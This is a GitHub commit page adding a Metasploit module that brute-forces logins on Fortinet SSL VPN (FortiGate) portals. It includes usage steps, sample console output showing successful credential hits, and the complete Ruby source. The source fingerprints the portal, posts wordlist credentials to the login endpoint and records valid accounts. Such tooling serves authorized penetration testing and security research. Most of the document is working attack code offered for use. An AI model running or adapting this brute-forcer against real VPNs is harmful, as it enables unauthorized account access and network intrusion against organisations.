Skip to content
Permalink
Browse files

Land #11427, Add Fortinet SSL VPN Bruteforce Login Utility

  • Loading branch information...
wchen-r7 committed Mar 7, 2019
2 parents 1588928 + 6fac0ec commit cf19a711fd2b349fa82108312b5e94fae199545a
@@ -0,0 +1,40 @@
This module tests credentials on Fortinet SSL VPN servers (FortiGate).

NOTE: This module is only executing when Fortinet SSL VPN Server is detected.
When the server cannot be verified the module stops working.
The realm/domain is used for every request when set.

The module supports IPv6 requests.
The module supports several hosts at the same time.

## Verification Steps

1. Do: ```use auxiliary/scanner/http/fortinet_ssl_vpn```
2. Do: ```set RHOSTS [IP]```
3. Configure a user and password list by setting either `USERNAME`, `PASSWORD`, `USER_FILE`, or `PASS_FILE`.
4. Do: ```run```

## Scenarios

IP-Addresses have been masked with x

```
msf5 auxiliary(scanner/http/fortinet_ssl_vpn) > run
[+] xxxx:xxxx:xxxx:xxxx::4:443 - Server is responsive...
[+] xxxx:xxxx:xxxx:xxxx::4:443 - Application appears to be Fortinet SSL VPN. Module will continue.
[*] xxxx:xxxx:xxxx:xxxx::4:443 - Starting login brute force...
[*] xxxx:xxxx:xxxx:xxxx::4:443 - [1/1] - Trying username:"testuser" with password:"superpass"
[+] SUCCESSFUL LOGIN - "testuser":"superpass"
[!] No active DB -- Credential data will not be saved!
[*] Scanned 1 of 2 hosts (50% complete)
[+] xxx.xxx.xxx.xxx:443 - [1/1] - Server is responsive...
[+] xxx.xxx.xxx.xxx:443 - [1/1] - Application appears to be Fortinet SSL VPN. Module will continue.
[*] xxx.xxx.xxx.xxx:443 - [1/1] - Starting login brute force...
[*] xxx.xxx.xxx.xxx:443 - [1/1] - Trying username:"testuser" with password:"superpass"
[+] SUCCESSFUL LOGIN - "testuser":"superpass"
[!] No active DB -- Credential data will not be saved!
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
```
@@ -0,0 +1,173 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Scanner

def initialize(info={})
super(update_info(info,
'Name' => 'Fortinet SSL VPN Bruteforce Login Utility',
'Description' => %{
This module scans for Fortinet SSL VPN web login portals and
performs login brute force to identify valid credentials.
},
'Author' => [ 'Max Michels <kontakt[at]maxmichels.de>' ],
'License' => MSF_LICENSE,
'DefaultOptions' =>
{
'SSL' => true,
'RPORT' => 443
}
))

register_options(
[
OptString.new('DOMAIN', [false, "Domain/Realm to use for each account", ''])
])
end

def run_host(ip)
unless check_conn?
vprint_error("Connection failed, Aborting...")
return false
end

unless is_app_ssl_vpn?
vprint_error("Application does not appear to be Fortinet SSL VPN. Module will not continue.")
return false
end

vprint_good("Application appears to be Fortinet SSL VPN. Module will continue.")

vprint_status("Starting login brute force...")
each_user_pass do |user, pass|
do_login(user, pass)
end
end

# Verify if server is responding
def check_conn?
begin
res = send_request_cgi('uri' => '/', 'method' => 'GET')
if res
vprint_good("Server is responsive...")
return true
end
rescue ::Rex::ConnectionRefused,
::Rex::HostUnreachable,
::Rex::ConnectionTimeout,
::Rex::ConnectionError,
::Errno::EPIPE
end
false
end

def get_login_resource
send_request_raw(
'uri' => '/remote/login?lang=en'
)
end

# Verify whether we're working with SSL VPN or not
def is_app_ssl_vpn?
res = get_login_resource
res && res.code == 200 && res.body.match(/fortinet/)
end

def do_logout(cookie)
send_request_cgi(
'uri' => '/remote/logout',
'method' => 'GET',
'cookie' => cookie
)
end

def report_cred(opts)
service_data = {
address: opts[:ip],
port: opts[:port],
service_name: 'Fortinet SSL VPN',
protocol: 'tcp',
workspace_id: myworkspace_id
}

credential_data = {
origin_type: :service,
module_fullname: fullname,
username: opts[:user],
private_data: opts[:password],
private_type: :password
}.merge(service_data)

login_data = {
last_attempted_at: DateTime.now,
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::SUCCESSFUL,
proof: opts[:proof]
}.merge(service_data)

create_credential_login(login_data)
end

# Brute-force the login page
def do_login(user, pass)
vprint_status("Trying username:#{user.inspect} with password:#{pass.inspect}")

begin
post_params = {
'ajax' => '1',
'username' => user,
'credential' => pass
}

#check to use domain/realm or not
if datastore['DOMAIN'].nil? || datastore['DOMAIN'].empty?
post_params['realm'] = ""
else
post_params['realm'] = datastore['DOMAIN']
end

res = send_request_cgi(
'uri' => '/remote/logincheck',
'method' => 'POST',
'ctype' => 'application/x-www-form-urlencoded',
'vars_post' => post_params
)

if res &&
res.code == 200 &&
res.body.match(/redir=/) &&
res.body.match(/&portal=/)

do_logout(res.get_cookies)
if datastore['DOMAIN'].nil? || datastore['DOMAIN'].empty?
print_good("SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
report_cred(ip: rhost, port: rport, user: user, password: pass, proof: res.body)
report_note(ip: rhost, type: "fortinet.ssl.vpn",data: "User: #{user}")
else
print_good("SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}:#{datastore["DOMAIN"]}")
report_cred(ip: rhost, port: rport, user: user, password: pass, proof: res.body)
report_note(ip: rhost, type: "fortinet.ssl.vpn",data: "User: #{user} / Domain: #{datastore["DOMAIN"]}")
end

return :next_user

else
vprint_error("FAILED LOGIN - #{user.inspect}:#{pass.inspect}")
end

rescue ::Rex::ConnectionRefused,
::Rex::HostUnreachable,
::Rex::ConnectionTimeout,
::Rex::ConnectionError,
::Errno::EPIPE
vprint_error("HTTP Connection Failed, Aborting")
return :abort
end
end
end

0 comments on commit cf19a71

Please sign in to comment.
You can’t perform that action at this time.
You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session.